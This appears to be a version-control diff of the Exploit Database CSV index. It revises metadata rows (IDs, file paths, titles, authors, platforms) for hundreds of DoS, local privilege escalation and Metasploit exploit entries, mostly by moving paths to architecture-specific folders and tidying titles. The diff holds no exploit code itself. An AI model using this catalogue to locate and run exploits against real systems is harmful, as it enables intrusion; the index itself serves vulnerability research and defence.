39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0
|
||||
39663,platforms/windows/dos/39663.html,"Microsoft Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",windows,dos,0
|
||||
39669,platforms/linux/dos/39669.txt,"Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco and Ismael Ripoll",linux,dos,0
|
||||
39669,platforms/lin_x86/dos/39669.txt,"Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco and Ismael Ripoll",lin_x86,dos,0
|
||||
39685,platforms/android/dos/39685.txt,"Google Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0
|
||||
39686,platforms/android/dos/39686.txt,"Google Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0
|
||||
39699,platforms/windows/dos/39699.html,"Microsoft Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use-After-Free",2016-04-15,"Marcin Ressel",windows,dos,0
|
||||
|
@ -5110,7 +5110,7 @@ id,file,description,date,author,platform,type,port
|
|||
39966,platforms/windows/dos/39966.txt,"Blat 3.2.14 - Stack Overflow",2016-06-16,Vishnu,windows,dos,0
|
||||
39795,platforms/windows/dos/39795.pl,"MediaInfo 0.7.61 - Crash (PoC)",2016-05-10,"Mohammad Reza Espargham",windows,dos,0
|
||||
39796,platforms/windows/dos/39796.py,"Ipswitch WS_FTP LE 12.3 - Search field Overwrite (SEH) (PoC)",2016-05-10,"Zahid Adeel",windows,dos,0
|
||||
39797,platforms/windows/dos/39797.py,"Core FTP Server 32-bit Build 587 - Heap Overflow",2016-05-10,"Paul Purcell",windows,dos,21
|
||||
39797,platforms/win_x86/dos/39797.py,"Core FTP Server 32-bit Build 587 - Heap Overflow",2016-05-10,"Paul Purcell",win_x86,dos,21
|
||||
39799,platforms/multiple/dos/39799.txt,"Adobe Reader DC 15.010.20060 - Memory Corruption",2016-05-10,"Pier-Luc Maltais",multiple,dos,0
|
||||
39800,platforms/linux/dos/39800.txt,"Nfdump Nfcapd 1.6.14 - Multiple Vulnerabilities",2016-05-10,Security-Assessment.com,linux,dos,0
|
||||
39801,platforms/android/dos/39801.c,"Google Android Broadcom Wi-Fi Driver - Memory Corruption",2016-05-11,AbdSec,android,dos,0
|
||||
|
@ -5300,7 +5300,7 @@ id,file,description,date,author,platform,type,port
|
|||
40878,platforms/windows/dos/40878.txt,"Microsoft Edge - CMarkup::EnsureDeleteCFState Use-After-Free (MS15-125)",2016-12-06,Skylined,windows,dos,0
|
||||
40879,platforms/windows/dos/40879.html,"Microsoft Internet Explorer 9 - CDoc::ExecuteScriptUri Use-After-Free (MS13-009)",2016-12-06,Skylined,windows,dos,0
|
||||
40880,platforms/windows/dos/40880.txt,"Microsoft Edge - CBaseScriptable::PrivateQueryInterface Memory Corruption (MS16-068)",2016-12-06,Skylined,windows,dos,0
|
||||
40883,platforms/windows/dos/40883.py,"Windows 10 x86/x64 WLAN AutoConfig - Denial of Service (POC)",2016-12-06,"Jeremy Brown",windows,dos,0
|
||||
40883,platforms/windows/dos/40883.py,"Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (POC)",2016-12-06,"Jeremy Brown",windows,dos,0
|
||||
40885,platforms/windows/dos/40885.py,"Dual DHCP DNS Server 7.29 - Denial of Service",2016-12-07,R-73eN,windows,dos,0
|
||||
40886,platforms/hardware/dos/40886.py,"TP-LINK TD-W8951ND - Denial of Service",2016-12-07,"Persian Hack Team",hardware,dos,0
|
||||
40888,platforms/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",linux,dos,0
|
||||
|
@ -5396,7 +5396,7 @@ id,file,description,date,author,platform,type,port
|
|||
200,platforms/bsd/local/200.c,"BSDi SUIDPerl - Local Stack Buffer Overflow",2000-11-21,vade79,bsd,local,0
|
||||
202,platforms/bsd/local/202.c,"BSDi 3.0 / 4.0 - rcvtty[mh] Local Exploit",2000-11-21,vade79,bsd,local,0
|
||||
203,platforms/linux/local/203.sh,"vixie-cron - Privilege Escalation",2000-11-21,"Michal Zalewski",linux,local,0
|
||||
205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation",2000-11-29,Tlabs,linux,local,0
|
||||
205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - 'SUID' Privilege Escalation",2000-11-29,Tlabs,linux,local,0
|
||||
206,platforms/linux/local/206.c,"dump 0.4b15 (RedHat 6.2) - Exploit",2000-11-29,mat,linux,local,0
|
||||
207,platforms/bsd/local/207.c,"BSDi 3.0 inc - Buffer Overflow Privilege Escalation",2000-11-30,vade79,bsd,local,0
|
||||
209,platforms/linux/local/209.c,"GLIBC (via /bin/su) - Privilege Escalation",2000-11-30,localcore,linux,local,0
|
||||
|
@ -5520,7 +5520,7 @@ id,file,description,date,author,platform,type,port
|
|||
779,platforms/linux/local/779.sh,"Linux ncpfs - Local Exploit",2005-01-30,super,linux,local,0
|
||||
788,platforms/linux/local/788.pl,"Operator Shell (osh) 1.7-12 - Privilege Escalation",2005-02-05,"Charles Stevenson",linux,local,0
|
||||
791,platforms/linux/local/791.c,"Setuid perl - PerlIO_Debug() Overflow",2005-02-07,"Kevin Finisterre",linux,local,0
|
||||
792,platforms/linux/local/792.c,"Setuid perl - PerlIO_Debug() Root Owned File Creation Privilege Escalation",2005-02-07,"Kevin Finisterre",linux,local,0
|
||||
792,platforms/linux/local/792.c,"Setuid perl - 'PerlIO_Debug()' Root Owned File Creation Privilege Escalation",2005-02-07,"Kevin Finisterre",linux,local,0
|
||||
793,platforms/osx/local/793.pl,"Apple Mac OSX - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,osx,local,0
|
||||
795,platforms/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,osx,local,0
|
||||
796,platforms/linux/local/796.sh,"Exim 4.42 - Privilege Escalation",2005-02-07,darkeagle,linux,local,0
|
||||
|
@ -5607,8 +5607,8 @@ id,file,description,date,author,platform,type,port
|
|||
1187,platforms/linux/local/1187.c,"Gopher 3.0.9 - (+VIEWS) Remote Client-Side Buffer Overflow",2005-08-30,vade79,linux,local,0
|
||||
1197,platforms/windows/local/1197.c,"Microsoft Windows - 'keybd_event' Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0
|
||||
1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Privilege Escalation (MS05-018)",2005-09-06,eyas,windows,local,0
|
||||
1215,platforms/linux/local/1215.c,"Wireless Tools 26 (IWConfig) - Privilege Escalation (some setuid)",2005-09-14,Qnix,linux,local,0
|
||||
1229,platforms/linux/local/1229.sh,"Qpopper 4.0.8 (Linux) - (poppassd) Privilege Escalation",2005-09-24,kingcope,linux,local,0
|
||||
1215,platforms/linux/local/1215.c,"Wireless Tools 26 (IWConfig) - Privilege Escalation",2005-09-14,Qnix,linux,local,0
|
||||
1229,platforms/linux/local/1229.sh,"Qpopper 4.0.8 (Linux) - 'poppassd' Privilege Escalation",2005-09-24,kingcope,linux,local,0
|
||||
1230,platforms/bsd/local/1230.sh,"Qpopper 4.0.8 (FreeBSD) - (poppassd) Privilege Escalation",2005-09-24,kingcope,bsd,local,0
|
||||
1248,platforms/solaris/local/1248.pl,"Solaris 10 (x86) - DtPrintinfo/Session Privilege Escalation",2005-10-12,"Charles Stevenson",solaris,local,0
|
||||
1267,platforms/linux/local/1267.c,"XMail 1.21 - '-t' Command Line Option Buffer Overflow Privilege Escalation",2005-10-20,qaaz,linux,local,0
|
||||
|
@ -5654,7 +5654,7 @@ id,file,description,date,author,platform,type,port
|
|||
1719,platforms/multiple/local/1719.txt,"Oracle 10g Release 2 - 'DBMS_EXPORT_EXTENSION' SQL Exploit",2006-04-26,N1V1Hd,multiple,local,0
|
||||
1772,platforms/windows/local/1772.c,"Intel Wireless Service - 's24evmon.exe' Shared Memory Exploit",2006-05-09,"Ruben Santamarta",windows,local,0
|
||||
1806,platforms/windows/local/1806.c,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (1)",2006-05-19,Devil-00,windows,local,0
|
||||
40336,platforms/windows/local/40336.py,"Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure",2016-09-05,"Yakir Wizman",windows,local,0
|
||||
40336,platforms/win_x86-64/local/40336.py,"Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure",2016-09-05,"Yakir Wizman",win_x86-64,local,0
|
||||
1831,platforms/linux/local/1831.txt,"tiffsplit (libtiff 3.8.2) - Local Stack Buffer Overflow (PoC)",2006-05-26,nitr0us,linux,local,0
|
||||
1910,platforms/windows/local/1910.c,"Microsoft Windows - (NtClose DeadLock) PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0
|
||||
1911,platforms/windows/local/1911.c,"Microsoft Windows Server 2000/XP - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0
|
||||
|
@ -5675,8 +5675,8 @@ id,file,description,date,author,platform,type,port
|
|||
2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Privilege Escalation (3)",2006-07-13,"Marco Ivaldi",linux,local,0
|
||||
2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Privilege Escalation (4)",2006-07-14,Sunay,linux,local,0
|
||||
2013,platforms/linux/local/2013.c,"Linux Kernel 2.6.17.4 - 'proc' Privilege Escalation",2006-07-15,h00lyshit,linux,local,0
|
||||
2015,platforms/linux/local/2015.py,"Rocks Clusters 4.1 - (umount-loop) Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local,0
|
||||
2016,platforms/linux/local/2016.sh,"Rocks Clusters 4.1 - (mount-loop) Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local,0
|
||||
2015,platforms/linux/local/2015.py,"Rocks Clusters 4.1 - 'umount-loop' Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local,0
|
||||
2016,platforms/linux/local/2016.sh,"Rocks Clusters 4.1 - 'mount-loop' Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local,0
|
||||
2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Privilege Escalation",2006-07-18,"Marco Ivaldi",linux,local,0
|
||||
2056,platforms/windows/local/2056.c,"Microsoft IIS - ASP Stack Overflow (MS06-034)",2006-07-21,cocoruder,windows,local,0
|
||||
2065,platforms/windows/local/2065.c,"Cheese Tracker 0.9.9 - Local Buffer Overflow (PoC)",2006-07-23,"Luigi Auriemma",windows,local,0
|
||||
|
@ -5721,7 +5721,7 @@ id,file,description,date,author,platform,type,port
|
|||
2737,platforms/osx/local/2737.pl,"Xcode OpenBase 10.0.0 (OSX) - (symlink) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0
|
||||
2738,platforms/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OSX) - (unsafe system call) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0
|
||||
2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OSX) - 'libucache.dylib' Privilege Escalation",2006-11-15,"Kevin Finisterre",osx,local,0
|
||||
40380,platforms/windows/local/40380.py,"PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure",2016-09-14,"Yakir Wizman",windows,local,0
|
||||
40380,platforms/win_x86-64/local/40380.py,"PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure",2016-09-14,"Yakir Wizman",win_x86-64,local,0
|
||||
2815,platforms/windows/local/2815.c,"XMPlay 3.3.0.4 - (M3U Filename) Local Buffer Overflow",2006-11-20,"Greg Linares",windows,local,0
|
||||
2824,platforms/windows/local/2824.c,"XMPlay 3.3.0.4 - (ASX Filename) Local Buffer Overflow",2006-11-21,"Greg Linares",windows,local,0
|
||||
2872,platforms/windows/local/2872.c,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow",2006-11-30,Expanders,windows,local,0
|
||||
|
@ -5855,7 +5855,7 @@ id,file,description,date,author,platform,type,port
|
|||
4364,platforms/windows/local/4364.php,"AtomixMP3 2.3 - '.pls' Local Buffer Overflow",2007-09-05,0x58,windows,local,0
|
||||
4392,platforms/multiple/local/4392.txt,"PHP 4.4.7 / 5.2.3 - MySQL/MySQL Injection Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0
|
||||
4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise 6.0 SP6 - Code Execution",2007-09-19,shinnai,windows,local,0
|
||||
4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",linux,local,0
|
||||
4460,platforms/lin_x86-64/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",lin_x86-64,local,0
|
||||
4515,platforms/solaris/local/4515.c,"Solaris 10 (SPARC/x86) - sysinfo Kernel Memory Disclosure",2007-09-01,qaaz,solaris,local,0
|
||||
4516,platforms/solaris/local/4516.c,"Solaris (SPARC/x86) - fifofs I_PEEK Kernel Memory Disclosure",2007-10-10,qaaz,solaris,local,0
|
||||
4517,platforms/windows/local/4517.php,"PHP 5.2.4 ionCube extension - Safe_mode / disable_functions Bypass",2007-10-11,shinnai,windows,local,0
|
||||
|
@ -5925,7 +5925,7 @@ id,file,description,date,author,platform,type,port
|
|||
6322,platforms/windows/local/6322.pl,"Acoustica Mixcraft 4.2 Build 98 - (mx4) Local Buffer Overflow",2008-08-28,Koshi,windows,local,0
|
||||
6329,platforms/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow",2008-08-29,Koshi,windows,local,0
|
||||
6333,platforms/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 - '.bcproj' Local Buffer Overflow",2008-08-30,Koshi,windows,local,0
|
||||
6337,platforms/linux/local/6337.sh,"Postfix 2.6-20080814 - (symlink) Privilege Escalation",2008-08-31,RoMaNSoFt,linux,local,0
|
||||
6337,platforms/linux/local/6337.sh,"Postfix 2.6-20080814 - 'symlink' Privilege Escalation",2008-08-31,RoMaNSoFt,linux,local,0
|
||||
6389,platforms/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - Local '.m3u' File Stack Buffer Overflow",2008-09-06,"fl0 fl0w",windows,local,0
|
||||
6705,platforms/windows/local/6705.txt,"Microsoft Windows 2003 - Token Kidnapping Local Exploit (PoC)",2008-10-08,"Cesar Cerrudo",windows,local,0
|
||||
6757,platforms/windows/local/6757.txt,"Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066)",2008-10-15,"Ruben Santamarta",windows,local,0
|
||||
|
@ -5941,7 +5941,7 @@ id,file,description,date,author,platform,type,port
|
|||
7129,platforms/multiple/local/7129.sh,"Sudo 1.6.9p18 - (Defaults setenv) Privilege Escalation",2008-11-15,kingcope,multiple,local,0
|
||||
7135,platforms/windows/local/7135.htm,"Opera 9.62 - 'file://' Local Heap Overflow",2008-11-17,"Guido Landi",windows,local,0
|
||||
7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - (error_log) Safe_mode Bypass",2008-11-20,SecurityReason,multiple,local,0
|
||||
7177,platforms/linux/local/7177.c,"Oracle Database Vault - ptrace(2) Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0
|
||||
7177,platforms/linux/local/7177.c,"Oracle Database Vault - 'ptrace(2)' Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0
|
||||
40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA root Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0
|
||||
7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - runtime.getRuntime().exec() Privilege Escalation",2008-11-28,Abysssec,windows,local,0
|
||||
7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Stack Overflow",2008-11-30,SkD,windows,local,0
|
||||
|
@ -6127,7 +6127,7 @@ id,file,description,date,author,platform,type,port
|
|||
9070,platforms/windows/local/9070.pl,"AudioPLUS 2.00.215 - '.pls' Local Buffer Overflow (SEH)",2009-07-01,Stack,windows,local,0
|
||||
9072,platforms/multiple/local/9072.txt,"Oracle 10g - SYS.LT.COMPRESSWORKSPACETREE SQL Injection (2)",2009-07-02,"Sumit Siddharth",multiple,local,0
|
||||
9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
|
||||
9083,platforms/linux/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off-by-One Local Exploit",2009-07-09,sgrakkyu,linux,local,0
|
||||
9083,platforms/lin_x86-64/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - set_selection() UTF-8 Off-by-One Local Exploit",2009-07-09,sgrakkyu,lin_x86-64,local,0
|
||||
9097,platforms/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink Attack",2009-07-09,kingcope,multiple,local,0
|
||||
9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro 8.02 - '.pdm' Local Buffer Overflow (SEH)",2009-07-10,His0k4,windows,local,0
|
||||
9135,platforms/linux/local/9135.sh,"Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Privilege Escalation",2009-07-13,nofame,linux,local,0
|
||||
|
@ -6202,7 +6202,7 @@ id,file,description,date,author,platform,type,port
|
|||
9521,platforms/linux/local/9521.c,"Linux Kernel 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure (1)",2009-08-26,"Clément Lecigne",linux,local,0
|
||||
9536,platforms/windows/local/9536.py,"PIPL 2.5.0 - '.m3u' Universal Buffer Overflow (SEH)",2009-08-28,mr_me,windows,local,0
|
||||
9540,platforms/windows/local/9540.py,"HTML Creator & Sender 2.3 build 697 - Local Buffer Overflow (SEH)",2009-08-28,Dr_IDE,windows,local,0
|
||||
9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)",2009-08-31,"INetCop Security",linux,local,0
|
||||
9542,platforms/lin_x86/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)",2009-08-31,"INetCop Security",lin_x86,local,0
|
||||
9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure (2)",2009-08-31,"Jon Oberheide",linux,local,0
|
||||
9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Privilege Escalation",2009-08-31,"Ramon Valle",linux,local,0
|
||||
9548,platforms/windows/local/9548.pl,"Ultimate Player 1.56b - '.m3u' / '.upl' Universal Local Buffer Overflow (SEH)",2009-08-31,hack4love,windows,local,0
|
||||
|
@ -6582,8 +6582,8 @@ id,file,description,date,author,platform,type,port
|
|||
14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - 'pushstring' Memory Corruption",2010-09-12,Abysssec,windows,local,0
|
||||
15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH Exploit",2010-09-15,"sanjeev gupta",windows,local,0
|
||||
15022,platforms/windows/local/15022.py,"Honestech VHS to DVD 3.0.30 Deluxe - Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0
|
||||
15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0
|
||||
15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,linux,local,0
|
||||
15023,platforms/lin_x86-64/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",lin_x86-64,local,0
|
||||
15024,platforms/lin_x86-64/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,lin_x86-64,local,0
|
||||
15026,platforms/windows/local/15026.py,"BACnet OPC Client - Buffer Overflow (1)",2010-09-16,"Jeremy Brown",windows,local,0
|
||||
15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - SEH Exploit",2010-09-17,"Abhishek Lyall",windows,local,0
|
||||
15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local SEH Exploit",2010-09-17,modpr0be,windows,local,0
|
||||
|
@ -6608,7 +6608,7 @@ id,file,description,date,author,platform,type,port
|
|||
15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker - '$ORIGIN' Expansion",2010-10-18,"Tavis Ormandy",linux,local,0
|
||||
15279,platforms/windows/local/15279.rb,"Fat Player 0.6b - '.wav' Buffer Overflow (SEH)",2010-10-18,"James Fitts",windows,local,0
|
||||
15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow",2010-10-19,Mighty-D,windows,local,0
|
||||
15304,platforms/linux/local/15304.txt,"GNU C Library 2.x (libc6) - Dynamic Linker LD_AUDIT Arbitrary DSO Load (Privilege Escalation)",2010-10-22,"Tavis Ormandy",linux,local,0
|
||||
15304,platforms/linux/local/15304.txt,"GNU C Library 2.x (libc6) - (Dynamic Linker LD_AUDIT Arbitrary DSO Load) Privilege Escalation",2010-10-22,"Tavis Ormandy",linux,local,0
|
||||
15312,platforms/windows/local/15312.py,"Winamp 5.5.8.2985 (in_mod plugin) - Stack Overflow",2010-10-25,"Mighty-D and 7eK",windows,local,0
|
||||
15344,platforms/linux/local/15344.c,"Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite",2010-10-28,"Kees Cook",linux,local,0
|
||||
15376,platforms/windows/local/15376.c,"Trend Micro Titanium Maximum Security 2011 - Local Kernel Exploit",2010-11-01,"Nikita Tarakanov",windows,local,0
|
||||
|
@ -6658,7 +6658,7 @@ id,file,description,date,author,platform,type,port
|
|||
15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,windows,local,0
|
||||
15888,platforms/windows/local/15888.c,"Bywifi 2.8.1 - Stack Buffer Overflow",2011-01-01,anonymous,windows,local,0
|
||||
15901,platforms/windows/local/15901.py,"Music Animation Machine MIDI Player - Buffer Overflow (SEH)",2011-01-04,Acidgen,windows,local,0
|
||||
15916,platforms/linux/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Privilege Escalation (1)",2011-01-05,"Dan Rosenberg",linux,local,0
|
||||
15916,platforms/lin_x86/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Privilege Escalation (1)",2011-01-05,"Dan Rosenberg",lin_x86,local,0
|
||||
15919,platforms/windows/local/15919.pl,"Enzip 3.00 - Buffer Overflow",2011-01-06,"C4SS!0 G0M3S",windows,local,0
|
||||
15934,platforms/windows/local/15934.py,"BS.Player 2.57 - Buffer Overflow (Unicode SEH)",2011-01-07,"C4SS!0 G0M3S",windows,local,0
|
||||
15936,platforms/windows/local/15936.py,"VeryTools VideoSpirit Pro 1.68 - Local Buffer Overflow",2011-01-08,xsploitedsec,windows,local,0
|
||||
|
@ -6723,7 +6723,7 @@ id,file,description,date,author,platform,type,port
|
|||
16631,platforms/windows/local/16631.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)",2010-09-25,Metasploit,windows,local,0
|
||||
16632,platforms/windows/local/16632.rb,"ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
|
||||
16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
|
||||
16634,platforms/windows/local/16634.rb,"Free Download Manager - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
|
||||
16634,platforms/windows/local/16634.rb,"Free Download Manager 3.0 Build 844 - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
|
||||
16636,platforms/windows/local/16636.rb,"Millenium MP3 Studio 2.0 - '.pls' Stack Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
|
||||
16637,platforms/windows/local/16637.rb,"VideoLAN VLC Media Player 1.1.6 - 'MKV' Memory Corruption (Metasploit)",2011-02-08,Metasploit,windows,local,0
|
||||
16640,platforms/windows/local/16640.rb,"feedDemon 3.1.0.12 - Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
|
||||
|
@ -6760,7 +6760,7 @@ id,file,description,date,author,platform,type,port
|
|||
16675,platforms/windows/local/16675.rb,"AstonSoft DeepBurner - '.dbr' Path Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,local,0
|
||||
16676,platforms/windows/local/16676.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (2)",2011-01-08,Metasploit,windows,local,0
|
||||
16677,platforms/windows/local/16677.rb,"CA AntiVirus Engine - CAB Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
|
||||
16678,platforms/windows/local/16678.rb,"VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,local,0
|
||||
16678,platforms/win_x86/local/16678.rb,"VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,local,0
|
||||
16679,platforms/windows/local/16679.rb,"Nuance PDF Reader 6.0 - Launch Stack Buffer Overflow (Metasploit)",2011-01-08,Metasploit,windows,local,0
|
||||
16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic - '.VBP' Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
|
||||
16681,platforms/windows/local/16681.rb,"Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
|
||||
|
@ -6870,7 +6870,7 @@ id,file,description,date,author,platform,type,port
|
|||
17892,platforms/windows/local/17892.pl,"Muse Music All-in-One 1.5.0.001 - '.pls' Buffer Overflow (DEP Bypass)",2011-09-26,"C4SS!0 G0M3S",windows,local,0
|
||||
17893,platforms/windows/local/17893.pl,"GTA SA-MP server.cfg - Local Buffer Overflow",2011-09-26,Silent_Dream,windows,local,0
|
||||
17902,platforms/windows/local/17902.c,"Norman Security Suite 8 - 'nprosec.sys' Privilege Escalation",2011-09-28,Xst3nZ,windows,local,0
|
||||
17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 < 0.101 - Linux Privilege Escalation",2011-10-05,zx2c4,linux,local,0
|
||||
17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 < 0.101 - Privilege Escalation",2011-10-05,zx2c4,linux,local,0
|
||||
17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass",2011-10-07,modpr0be,windows,local,0
|
||||
17942,platforms/linux/local/17942.c,"pkexec - Race Condition Privilege Escalation",2011-10-08,xi4oyu,linux,local,0
|
||||
17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate - '.PLP' File id Parameter Overflow (Metasploit)",2011-10-10,Metasploit,windows,local,0
|
||||
|
@ -7277,8 +7277,8 @@ id,file,description,date,author,platform,type,port
|
|||
19992,platforms/linux/local/19992.c,"BSD mailx 8.1.1-10 - Buffer Overflow (2)",1999-07-03,funkysh,linux,local,0
|
||||
19993,platforms/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A - Mailclient Temporary Link",2000-06-06,"Gert Fokkema",windows,local,0
|
||||
19999,platforms/multiple/local/19999.txt,"BRU 15.1/16.0 - BRUEXECLOG Environment Variable",2000-06-05,"Riley Hassell",multiple,local,0
|
||||
20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Privilege Escalation (Sendmail) (1)",2000-06-07,"Florian Heinz",linux,local,0
|
||||
20001,platforms/linux/local/20001.sh,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Privilege Escalation (Sendmail 8.10.1) (2)",2000-06-07,"Wojciech Purczynski",linux,local,0
|
||||
20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail) Capabilities Privilege Escalation(1)",2000-06-07,"Florian Heinz",linux,local,0
|
||||
